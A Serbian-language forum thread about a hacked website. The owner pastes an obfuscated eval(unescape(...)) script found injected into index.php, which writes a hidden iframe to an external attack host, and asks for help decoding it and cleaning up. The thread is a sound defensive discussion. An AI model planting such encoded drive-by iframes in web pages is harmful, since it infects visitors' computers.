Trebalo bi da je dovoljno da samo download-ujes sadrzaj i skeniras nekim antivirusom.
Na osnovu cega ti je palo na pamet da ti je sajt zarazen virusom?

Prilikom pristupa sajtu pre 10 dana mi se pojavio trojanac na kompu, a i sad mi je i jedan clan sajta poslao mail.

Da li bas imas trojanca na kompu ili je samo antivirus prijavio dok si otvarala neku stranu na sajtu? Stvar je u tome da antivirusi nekada prijavljuju takve stvari u javascript (*.js) fajlovima cak i ako nema stvarno niceg zlonamernog.

Ne samo da sam imala trojanca nego sam morala 2x da reinstaliram os. Treci put sam mu dosla glave.
Imala sam win32.dll koji nisu uspeli da obrisu ni nod32, adaware, s&d, spyware terminator i jos nekoliko program koja sam skinula sa neta. Ne moze se obrisati ni u safemodu, posto pravi systemske fajlove, instalira se medju drajverima...Na kraju sam ga eliminisala kombinacijom Regrunovog programcica Reanimator i SDfixom.


Nego, zar nije cudno imati u index.php ovako nesto:

<!-- ~ --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%
33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36
%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%
33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32
%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%
5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C
%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%
75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%
30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%
30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%
36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%
32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%
5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%
75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%
30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%
30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%
32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%
39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%
5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%
75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%
30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%
30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%
36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%
64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
</script><!-- ~ -->


Znam da je encodovani html, koji kad se dekoduje meni bar nista ne govori, ali mi deluje prilicno sumnjivo.

Ovo kad se dekoduje kompletno znači:


A meni firefox 3 kaže za taj sajt (orentraff.cn) da je "Reported Attach Site!", tako da ovo definitivno jeste sumnjivo.

@ zekica
Aj me nauci kako da to dekodiram? Imao sam na jednom mjestu slican problem, koji sam doduse rijesio, ali nikad mi nije uspjelo da skapiram sta je taj kod :S

Dobro, razresili smo misteriju, sajt je hakovan:)Ima gomila stvari o tom orentraff.cn na netu.

Obrisala sam kod u index.php fajlu i index2.php. Sad me zanima da li treba da chekiram svaki fajl na sajtu i vidim da li ima nesto sumnjivo ili neko ima ideju gde i sta prvo da trazim?
Drugo, da li treba i sql bazu da proverim (kojoj trenutno iz nepoznatih razloga ne mogu da pristupim preko phpmyadmin-a) u potrazi za nekim 'fantomskim juzerima' kako procitah na nekom forumu?

Trece, kao sto rece yolja624, Zekice kako si dekodirao? :) Ja sam probala nesto na netu, ali to je bezveze.